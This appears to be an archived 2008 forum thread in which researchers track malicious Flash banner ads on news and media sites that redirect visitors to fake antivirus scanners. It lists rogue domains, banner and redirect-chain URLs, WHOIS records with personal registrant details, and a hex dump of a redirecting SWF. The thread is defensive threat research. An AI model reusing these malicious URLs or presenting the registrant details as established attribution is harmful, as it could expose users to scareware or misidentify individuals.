  29. Antispamdeluxe.com
  30. Antispamgold.com
  31. Antispyadvanced.com
  32. Antispywarexp.com
  33. Antivirus-solution.net
  34. Antiviruspremium.com
  35. Antivirusprogramsite.com
  36. Antivirusprotectionsite.com
  37. Antivirusprotector.com
  38. Antivirusprotectorsite.com
  39. Antivirusultra.com
  40. Antiviruswebsite.com
  41. Antiviruswebsitereviews.com
  42. Aresdeluxe.com
  43. Aresdownloadnow.com
  44. Autobargainsnetwork.com
  45. Baptismrecords.com
  46. Bearflixsoftware.com
  47. Better-fitness.com
  48. Bloggingforsuccess.com
  49. Bundleway.com
  50. Cdcopysite.com
  51. Cdtomp3site.com
  52. Click-new-download.com
  53. Commissionsystem.com
  54. Completedigitaltv.com
  55. Completedownloadcenter.com
  56. Consumerfavorite.com
  57. Courtrecordfinder.com
  58. Courtrecordslookup.com
  59. Customersupporthome.com
  60. Datainfoplace.com
  61. Dateanybabe.com
  62. Datingdoctorsite.com
  63. Desktopsatellitetv.com
  64. Detectiveadvanced.com
  65. Detectivehound.com
  66. Detectivelookup.com
  67. Detectivenetsearch.com
  68. Detectivesearches.com
  69. Detectivewatch.com
  70. Digitaldishsoftware.com
  71. Digitaltv2pc.com
  72. Digitaltvsoftware.com
  73. Digitaltvtopc.com
  74. Disccopyplus.com
  75. Disccopypro.com
  76. Dloadinfo.com
  77. Doctoradware.com
  78. Doctoradwarepro.com
  79. Dogproblemsite.com
  80. Dogproblemswebsite.com
  81. Download-ares-free.com
  82. Download-shareaza-free.com
  83. Downloadacceleratornow.com
  84. Downloadaresnow.com
  85. Downloadcharge.com
  86. Downloadingcharge.com
  87. Downloadingnet.com
  88. Downloadmoviewebsite.com
  89. Downloadnerd.com
  90. Downloadsignup.com
  91. Drivingwebrecords.com
  92. Dumbi.com
  93. Dvdcdcopypro.com
  94. Dvdcopysitereviews.com
  95. Dvdtocdexpert.com
  96. Dvdtocdsite.com
  97. Dvdxpremium.com
  98. Dvdxultra.com
  99. E-mp3now.com
  100. Easycdrip.com
  101. Easycopynow.com
  102. Easymovieplayer.com
  103. Easypspdownloads.com
  104. Edetectivesite.com
  105. Erasehistorynow.com
  106. Expertbucks.com
  107. Expertcash.com
  108. Explosioncash.com
  109. Extremepaidsurveys.com
  110. Ezdvdx.com
  111. Fastmp3network.com
  112. File-sharing-reviews.com
  113. Filesharing-downloads.com
  114. Filevoom.com
  115. Filevoom.net
  116. Filevoom.org
  117. Filevoompro.com
  118. Firewallprotectionpro.com
  119. Firewallprotectionsite.com
  120. Firewallprotector.com
  121. Flashdollars.com
  122. Footballnetworks.net
  123. Free-ares-music.com
  124. Free-azureus-downloads.com
  125. Free-bearflix-downloads.com
  126. Free-bearshare-downloads.com
  127. Free-bitcomet-downloads.com
  128. Free-bitlord-downloads.com
  129. Free-bittornado-downloads.com
  130. Free-bittorrent-downloads.com
  131. Free-downloadz.com
  132. Free-emule-downloads.com
  133. Free-frostwire-downloads.com
  134. Free-imesh-downloads.com
  135. Free-klite-downloads.com
  136. Free-limewire-now.com
  137. Free-morpheus-downloads.com
  138. Free-soulseek-downloads.com
  139. Fullpaidsurveys.com
  140. Fullsoftwarecenter.com
  141. Futurehometv.com
  142. Gamedownloadpro.com
  143. Gameproadvance.com
  144. Games2pc.com
  145. Gamewebsitereviews.com
  146. Getfilevoom.com
  147. Getnetmovies.com
  148. Getnetmusic.com
  149. Getpcmovies.com
  150. Getpcmusic.com
  151. Giantpartner.com
  152. Gogosearches.com
  153. Gogotoolbar.com
  154. Goldensurvey.com
  155. Grogster.com
  156. Guyvsgirl.com
  157. Historycleanup.com
  158. Historywashdown.com
  159. Hotmp3music.com
  160. Hotmp3now.com
  161. Huntdetective.com
  162. I-mp3access.com
  163. I-mp3music.com
  164. I-pspaccess.com
  165. I-zuneaccess.com
  166. Imusic-store.com
  167. Imusicadvance.com
  168. Incrediblechannels.com
  169. Incredibletv.com
  170. Infodownloading.com
  171. Infowebdownload.com
  172. Internetdownloading.net
  173. Internetdownloads.net
  174. Internetdownloadstore.com
  175. Internettv-pro.com
  176. Ipod-wiz.com
  177. Ipodclassic.com
  178. Ipoddownloadingpro.com
  179. Ipodflow.com
  180. Ipodnetdownloads.com
  181. Ipodnetmovies.com
  182. Ipodwebsitereviews.com
  183. Isoftwaretv.com
  184. Itunes-planet.com
  185. Itvdownload.com
  186. Izuneaccess.com
  187. K-litegold.com
  188. K-litetk.com
  189. K9instructor.com
  190. Kazz.com
  191. Kl-kpp.net
  192. Klitegeneration.com
  193. Klitegold.com
  194. Live-tv-net.com
  195. Madgreen.com
  196. Magicrevenue.com
  197. Masterpsp.com
  198. Maxpaidsurveys.com
  199. Mediaburning.com
  200. Microantivirusxp.com
  201. Moviedownloadaccess.com
  202. Moviedownloadreview.biz
  203. Moviedownloadscenter.com
  204. Movieproadvance.com
  205. Moviesforpc.com
  206. Moviewebsitereviews.com
  207. Mp3downloadingsite.com
  208. Mp3musicdirect.com
  209. Mp3musichit.com
  210. Mp3musicpro.com
  211. Mp3review.biz
  212. Mp3section.com
  213. Musicmoviezone.com
  214. Musicwebsitereviews.com
  215. My-ipodaccess.com
  216. Myaresdownloads.com
  217. Myfuturetv.com
  218. Myipodaccess.com
  219. Mypspcenter.com
  220. Mypspdownload.com
  221. Mypspsource.com
  222. Mytvdownloads.com
  223. Myvirusguardian.com
  224. Myzunedownloads.com
  225. Netbackgroundchecks.com
  226. Netfreedownloads.com
  227. Netmusichome.com
  228. Netonlineinvestigator.com
  229. Netonlineinvestigators.com
  230. Netpaidshopping.com
  231. Netpspdownloads.com
  232. Netpspmovies.com
  233. Netsoftwarecorp.com
  234. Netsoftwareinc.com
  235. Netsoftwaretool.com
  236. Netwebinvestigator.com
  237. Newdownloading.com
  238. Newest-music.com
  239. Newvoomtube.com
  240. Nexthometv.com
  241. Officialdvdcopy.com
  242. Onedownloading.com
  243. Onlinemoneypack.com
  244. Onlineprotv.com
  245. Onlinetvtopc.com
  246. Penile-enlargement.biz
  247. Peoplepageslookup.com
  248. Peopleregistry.info
  249. Peoplesearchengine.info
  250. Pestbot.com
  251. Pestguardian.com
  252. Pestprotector.com
  253. Poperkiller.com
  254. Popprotection.com
  255. Popup-protection.com
  256. Popupblockersite.com
  257. Popupkillersite.com
  258. Popupprotectionsite.com
  259. Popupsystem.com
  260. Popwash.com
  261. Premiumstations.com
  262. Proadware.com
  263. Promotercash.com
  264. Pspflow.com
  265. Pspnetdownloads.com
  266. Pspwebsitereviews.com
  267. Pureaffiliates.com
  268. Puredvdcopy.com
  269. Qualitychannels.com
  270. Qualitytvtopc.com
  271. Quickdvdcopies.com
  272. Quickdvdcopy.com
  273. Quickdvdcopy.net
  274. Quickfreemovies.com
  275. Quickipoddownloads.com
  276. Realonlinetv.com
  277. Registryadvance.com
  278. Registryassistant.com
  279. Registrydebug.com
  280. Registryfixup.com
  281. Registryrepairsite.com
  282. Repocarfinder.com
  283. Reversednscheck.com
  284. Reverseipsearch.com
  285. Safesharing.com
  286. Satellitelivetopc.com
  287. Shareazasite.com
  288. Signupway.com
  289. Songrush.com
  290. Specialchannels.com
  291. Spyadvanced.com
  292. Spybotnow.com
  293. Spywarecommander.com
  294. Spywaredeluxe.com
  295. Spywareprotectionsite.com
  296. Spywareremoversite.com
  297. Spywarescansite.com
  298. Spywarexp.com
  299. Systemdollars.com
  300. Taxlookups.com
  301. The-internet-tv.com
  302. The-rich-kid.com
  303. Theaffiliatenetworks.com
  304. Thecreditcheckers.com
  305. Thepcsatellite.com
  306. Thespamblock.com
  307. Top-moviedownloads.com
  308. Topmp3choices.com
  309. Tv-onlinepro.com
  310. Tvdigitalchannels.com
  311. Tvdownloadonline.com
  312. Tvnowsite.com
  313. Tvonline-pro.com
  314. Tvonline-sports.com
  315. Tvonlinepro.com
  316. Tvproonline.com
  317. Tvrevenue.com
  318. Tvsatellitetopc.com
  319. Tvsuperior.com
  320. Ultimatemp3player.com
  321. Ultimatevideosite.com
  322. Ultramoviedownloads.com
  323. Unlimitedmp3downloads.com
  324. Videoplayersite.com
  325. Virusnuke.com
  326. Virusprotectionxp.com
  327. Virusscansite.com
  328. Voomtube.com
  329. Voomtube.net
  330. Voomtubenow.com
  331. Web-tvonline.com
  332. Webiphoneaccess.com
  333. Webiphonedownloads.com
  334. Webipoddownload.com
  335. Webmoviesreview.com
  336. Webmp3files.com
  337. Webpspdownload.com
  338. Webspeedplus.com
  339. Webzuneaccess.com
  340. Weightlossfirst.com
  341. Wiredworldtv.com
  342. Worldtvaccess.com
  343. Worldwidestreams.com
  344. Worldwiredpc.com
  345. Worldwiredtv.com
  346. Zune-access.com
  347. Zunedownloadnow.com
Note: Robtex does limit the output to 100 results, this is the complete list. We notice some interesting domains again.
Kimberly
<h4>
USAToday.com
</h4>
The malicious advertisement banner present on USAToday.com has been identified by WebSense. It's the 728x90 version of the Ebooks advert - ref 2th April.
Full details & a screenshot are available here.

Kimberly
<h4>
USAToday.com
</h4>
Although certain parts of the URL were left out in the write up by Websense, it wasn’t too difficult to decipher the link leading to the advertising banner. No new domains as we can see in the campaign links.
IPB Image
Banner.
i.usatoday.net/sponsors/2008/eBooksInternational-23978/Originals/728x90.swf
Campaign.
officialstat.net/c/index.php?id=QzdxNmlBUjdkaEtVm7NkiZVIwUVc1d0hoPTEyMDY3MjMyNjImcG56Y252dGE9Ymm7NkiZ3cmVyenm7NkiZucQYNkiDgNmYNkiDgNm

waytotheprofit.com/?cmpid=osjeremiad&adid=intl
<h4>
Updates
</h4>
fosterfarms.com

The iframes have been removed from the website since yesterday. It *should* be safe to visit now.

metacafe.com

They have made the choice to ignore my email. The links are still alive. I know, I'm repeating myself again but I really insist on the fact that identified malicious content should be removed immediately by the admin.
Kimberly
<h4>
deseretnews.com - sltrib.com
</h4>
We got reports of a banner being present on deseretnews.com and / or sltrib.com. Below is the advertisment found at deseretnews.com. It represents an advert for TravelTray ... yes the same traveltray.com involved in several redirects. When we look at the banner link, it is cristal clear that Forceup sold this campaign to NAC (Newspaper Agency Corporation).
IPB Image
Banner.
63.225.61.4:8080/ads/Forceup/onentirely728x90.swf
Campaign.
stat-diagnostic-imaging.net/crossdomain.xml

stat-diagnostic-imaging.net/c/index.php?id=Nnm7NkiZlYXFkT0V2SnQ0dGVGenVCeUxoPTEyMDY0NDYwMDImcG56Y252dGE9YmFyYWd2m7NkiZXJ5bAYNkiDgNmYNkiDgNm

waytotheprofit.com/?cmpid=onentirely&adid=intl

antispywaremaster.com/data/?440e535753&gai=onentirely&gli=intl&3&mt_info=5773_6484_18136
______________________________

banners4.nacorp.com - 63.225.61.4

Newspaper Agency Corporation
Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: NACORP.COM

The probability that the same malvert is also present on sltrib.com is very high since both websites
  • share the same advertising platform.
  • they serve identical ads at exactly the same time.
______________________________

The IP's of traveltray.com and antispywaremaster.com are still the same.
  1. traveltray.com - 194.110.67.23
  2. antispywaremaster.com - 87.117.252.11
<h4>
Update
</h4>
Being the same banner at sltrib.com isn't a speculation anymore. Below is a screen shot in situ. The link, the campaign & scanner are of course the same.
IPB Image
Kimberly
<h4>
Lady Speed Stick
</h4>
Forwarded by email to me and Sandi this afternoon.

This is the 300x250 version of the deo advertisement discovered by Sandi on 123greetings.com earlier this month.
IPB Image IPB Image
Campaign.
adtds2.promoplexer.com/statsa.php?campaign=bruno&u=1207830611682
From here on we are redirected to the online malware scanner; which will of course depend on our geographic location. We also hit adsraise.com/mbuyers/statistics.html.
Kimberly
<h4>
photobucket.com
</h4>
A warning about photobucket.com was issued by a person called "Jack" at Sandi's blog. We both have been looking for the advert since a couple of hours. It's the same "travel" banner as seen on 3th April. The first campaign URL points to a different domain but the cmpid reference at waytotheprofit.com is the same.

Screenshot in situ.
IPB Image
Banner.
content.yieldmanager.edgesuite.net/atoms/d0/e4/38/21/d0e4382110fedd6e68c86c5f1febe683.swf
Campaign.
stathome.net/c/index.php?id=eWthVEdIdkFTY0RBcXpPQjm7NkiZ0Ym9oPTEyMDc2NTY3NzEmcG56Y252dGE9dmFmbmVxYmF2cAYNkiDgNmYNkiDgNm

waytotheprofit.com/?cmpid=insardonic&adid=intl
<h4>
2 additional banners
</h4>
Two additional banners discovered by Sandi.
  1. Emusic.com
  2. GetFreecar

Kimberly
<h4>
nytimes.com
</h4>
A malicous banner targeting Mac's is present on nytimes.com.
Ref.

<h4>
colgate
</h4>
A new advertisement has been discovered, for Colgate Toothpaste this time. Screenshots
Honestly this doesn't surprise me at all. Lady SpeedStick is a brand of them too.

<h4>
track.trackads.net - 67.205.93.102
</h4>
Website Title: 404 - Not Found
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-04-07
Expires: 2009-04-07
Name Server: NS1.TRACKADS.NET (has 1 domains)
Name Server: NS2.TRACKADS.NET
Whois Server: whois.estdomains.com
IP Location - Canada - Groupe Iweb Technologies Inc
Dedicated Hosting: trackads.net is hosted on a dedicated server

Queried whois.arin.net with "!NET-67-205-93-96-1"...

CustName: Private Customer - iWeb
Address: Olevska 3
City: Kiev
StateProv:
PostalCode: 03164
Country: UA
RegDate: 2008-04-03
Updated: 2008-04-03

NetRange: 67.205.93.96 - 67.205.93.103
CIDR: 67.205.93.96/29
OriginAS: AS32613
NetName: IWEB-CL-T006-201CL
NetHandle: NET-67-205-93-96-1
Parent: NET-67-205-64-0-1
NetType: Reassigned
Comment:
RegDate: 2008-04-03
Updated: 2008-04-03

trackads.net did exist before, it belonged to InvestConcepts.
Registrar: INNERWISE, INC. D/B/A ITSYOURDOMAIN.COM
Registrant
InvestConcepts, LLC
InvestConcepts, LLC
j_cohen31@yahoo.com
7280 Forest Lane, suite 2100
Dallas, Tx 75230 US
+1.2142240961

Record created on September 25, 2006
Record last updated on September 28, 2006
Record expires on September 25, 2007
Iweb Technologies Inc was first seen with the FedEx malvert.

<h4>
67.205.75.9
</h4>
67.205.75.9 has also been updated on on 7th April with a newcomer.

pidosoftware.com - 67.205.75.9

Website Title: 404 - Not Found
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-04-07
Expires: 2009-04-07
Name Server: NS.PIDOSOFTWARE.COM
Name Server: NS1.US.EDITDNS.NET (has 9,382 domains)
Name Server: NS2.US.EDITDNS.NET
Name Server: NS3.US.EDITDNS.NET
Whois Server: whois.estdomains.com

Current Websites.
  1. Antispywaredeluxe.com
  2. pidosoftware.com
  3. Spywaredestructor.com
Kimberly
<h4>
'Mac' screenies
</h4>
Running Mac ? ... this is what you might expect to see.
IPB Image

IPB Image
<h4>
winantiviruspro.net - 77.91.225.234
</h4>
winantiviruspro.net, something to keep an eye on in the upcoming days ... especially with the mention Free Scan present on the website.

Website Title: WinAntivirusPro - Official Web site
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-04-08
Expires: 2009-04-08
Registrar Status: clientTransferProhibited
Name Server: NS1.WINANTIVIRUSPRO.NET (has 1 domains)
Name Server: NS2.WINANTIVIRUSPRO.NET
Whois Server: whois.estdomains.com
IP Location - Russian Federation - Netplace
Dedicated Hosting: winantiviruspro.net is hosted on a dedicated server.
Kimberly
<h4>
www.radiofrance.fr - Lady SpeedStick
</h4>
An alert received by a friend of mine - thx for spotting it smile.gif

Screenshot in situ.
IPB Image
Note: The redirects occurs immediately as the malicious banner is present on the homepage.

Banner.
media.ftv-publicite.fr/0/OasDefault/2008_1349_I_1_4__Mega-RF-RG//france_728x90_LADY.swf
IPB Image
IPB Image
Campaign.
adtds2.promoplexer.com/statsa.php?campaign=france&u=1208215800269
track.trackads.net/statsa.php?campaign=france&u=1208215800269
track.trackads.net/statsg.php?campaign=france&u=1208215800269

track.trackads.net/swf/gnida.swf?campaign=france&u=1208215800269&
paramss=sbbOm6%2FRtq2elZejqpjT18%2FXxNup

track.trackads.net/statss.php?campaign=france&u=1208215800269&
paramssmss=sbbOm6%2FRtq2elZejqpjT18%2FXxNup

tds.maxconvert.com/?paramss=sbbOm6/Rtq2elZejqpjT18/XxNup
adtds.trackads.net/in.cgi?2&depid=maxc_clr08&cid=2271&parid=mc_419425211&
antispywaredeluxe.com/scanner/scan.php?landid=2&depid=maxc%5Fclr08&cid=2271&parid=mc%5F419425211&bs=1
IPB Image
adtds.trackads.net - 67.205.93.102
Kimberly
<h4>
Update
</h4>
Another version of Lady SpeedStick is circulating on radiofrance.fr and has been discovered by Sandi. Details & screenshots available here.

<h4>
New Alert
</h4>
A malicous banner might be present either on the Sony, Toshiba or Newegg website. The malvert redirects to :
scanner.spyshredderscanner.com/2/?advid=4198
IPB Image
Thanks for the heads-up. wink.gif
Kimberly
<h4>
More French websites
</h4>
Lady SpeedStick is everywhere! This campaign will have a huge impact because the malicious banners are also present on the other websites belonging to the French National Media. Each site contains the 2 different sizes of the adverts.

revuedepresse.france.fr
IPB Image
france2.fr
IPB Image
france3.fr
IPB Image
rfo.fr

The 2 banners at the same time.
IPB Image
The group possesses other websites & regional editions of their main websites … one can easily figure out how many people have been hit by these malicious banners.

France Télévisions on Wikipedia
Kimberly
<h4>
Desperately Seeking Buyers ...
</h4>
Audacious, reckless, have no ph34r … I don’t know how to label it right now.

You are a small advertising company called ForceUp; you don’t know how to reach your audience or to distribute your adverts … adroll.com
IPB Image
http://www.adroll.com/about/company
QUOTE
Company
We are pioneering a new model of social advertising that makes buying and selling ads easier, more profitable, and ultimately, more relevant for everyone (including your visitors).

Our team is passionate about finding a better way for online businesses to thrive, and is always looking for others who think advertising can be inspired, thrilling, fun and social. Adroll is based in San Francisco, California.

Who rolled this out?
Adroll was started by a bunch of high-tech professionals frustrated by the irrelevant ads appearing on our favorite sites. We wanted more say in which advertising was effective, and thought publishers and advertisers might too.
Take the time to read the whole page before continuing here.
______________________________

How did I fall on this? Just was doing some general advertising research and I saw ForceUp mentioned. They subscribed to the services provided by adroll.com.
IPB Image
Not only they did subscribe but also offered a preview of their advertisement campaign. While most limit themselves to some gif files, ForceUp was very generous by offering a flash version of their preview … and guess what? Yep it’s active and redirects people as seen below.
IPB Image
Banner.
www.adroll.com/u/ads/POOPATPCXNFSNB35TZLVYO/FKM7SN4NXNAJLH75HOCZYB.swf
Campaign.
page2.googiesindication.com/crossdomain.xml

page2.googiesindication.com/c/index.php?id=eWtkekFoRmpzSFQwMWVySTVRSUNoPTEyMDQwMzE5MjMmcG56Y252dGE9Ymm7NkiZmcmFncmFwcgYNkiDgNmYNkiDgNm

waytotheprofit.com/?cmpid=ossentence

prevedmarketing.com/?tmn=mwatmpsmcmp&aid=ossentence&lid=&ax=1&ed=2&mt_info=5640_5846_16615

scanner2.malware-scan.com/14_swp/?tmn=null&aid=ossentence_ma14s_mb1sct&lid=&affid=&ax=1&ed=2&mt_info=5640_5846_16615:5745_0_16604

statsgod.com/a/?lang=en&aid=ossentence_ma14s_mb1sct&lid=keyin&affid=keyin&prod_id=655&ref=

bucksbill.com/.stats/refil.php?p=14&aid=ossentence_ma14s_mb1sct&lid=keyin&affid=keyin
______________________________

The "trial campaign file" seems to be from 27 February 2008 as seen in the screenshot below.
IPB Image
Now, I dunno what to think. Malicious flash adverts did hit the news a while back. We did mention ForceUp being related to malverts back in December 2007 and yet adroll accepts to “place” their advertisements … A lack of information, investigation, knowledge … ? No qualified personnel? Do they all just care about the money and nothing else? One thing I know for sure, if that was my company, the person who accepted the contract would be busted, point.

<h4>
New domain
</h4>
At least this "escapade" in advertland did reveal us a new domain but not a new IP ...

page2.googiesindication.com - 190.15.64.189

I did mention the presence of gnida.swf on 190.15.64.189 on Jan 25 2008 without having a domain name to associate with the IP. Ref here.
Registrant:
Jon Lod (mail@googiesindication.com)

Hok drvive 1092
Malta, NONE 1224
MT
545454544

Domain Name: googiesindication.com

Administrative, Technical, Billing Contact:
Jon Lod (mail@googiesindication.com)

Hok drvive 1092
Malta, NONE 1224
MT
545454544

Record created on Nov 26 2007.
Record expires on Nov 26 2008.
Domain servers:
ns1.googiesindication.com
ns2.googiesindication.com

Domain Service Provider: SoftSolutions Inc
At Domain Tools, it is still listed under Switzerland - Pc Ions Incorporation .. does ring a bell doesn't it ?
Website Title: None given.
Indexed Data
Compete Rank: #332,605 with 3,805 U.S. visitors per month

Registry Data
ICANN Registrar: TLDS, LLC DBA SRSPLUS
Created: 2007-11-26
Expires: 2008-11-26
Registrar Status: clientTransferProhibited
Name Server: NS1.GOOGIESINDICATION.COM (has 1 domains)
Name Server: NS2.GOOGIESINDICATION.COM
Whois Server: whois.srsplus.com

Server Data
IP Address: 217.150.254.47
IP Location - Switzerland - Pc Ions Incorporation

- All Your SWF Are Belong To Us -
Kimberly
<h4>
Update
</h4>
A couple of days ago I issued a warning about the possibility of a banner being present at Sony, Toshiba or Newegg. I have since then additional information about the incident. The person was using Tor and FireFox with noscript and adbocking, so the redirect (which really occured) couldn't have been caused by a SWF file. Instead, the person did hit a bad exit node in Tor and suffered of a malicious script or iframe.

Reference
QUOTE
While Tor blocks attackers on your local network from discovering or influencing your destination, it opens new risks: malicious or misconfigured Tor exit nodes can send you the wrong page, or even send you embedded Java applets disguised as domains you trust.
<h4>
id325708.adszedo.com
</h4>
We first noticed id325708.adszedo.com in the malicious FedEx advertisement here. The website is now hosting the infamous gnida.swf, statsa.php, statsg.php & statss.php files.

id325708.adszedo.com/rgd/statsa.php is a Flash file containing an embedded redirect to statsg.php.
CODE
0: 465753064F000000 300A00A0000C0100 FWS•O••• 0•••••••
10: 4302FFFFFF3F0330 000000832C006874 C••••?•0 ••••,•ht
20: 74703A2F2F696433 32353730382E6164 tp://id3 25708.ad
30: 737A65646F2E636F 6D2F7267642F7374 szedo.co m/rgd/st
40: 617473672E706870 00000040000000   atsg.php •••@•••
statsg.php loads id325708.adszedo.com/rgd/swf/gnida.swf

- All Your SWF Are Belong To Us -
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2014 Invision Power Services, Inc.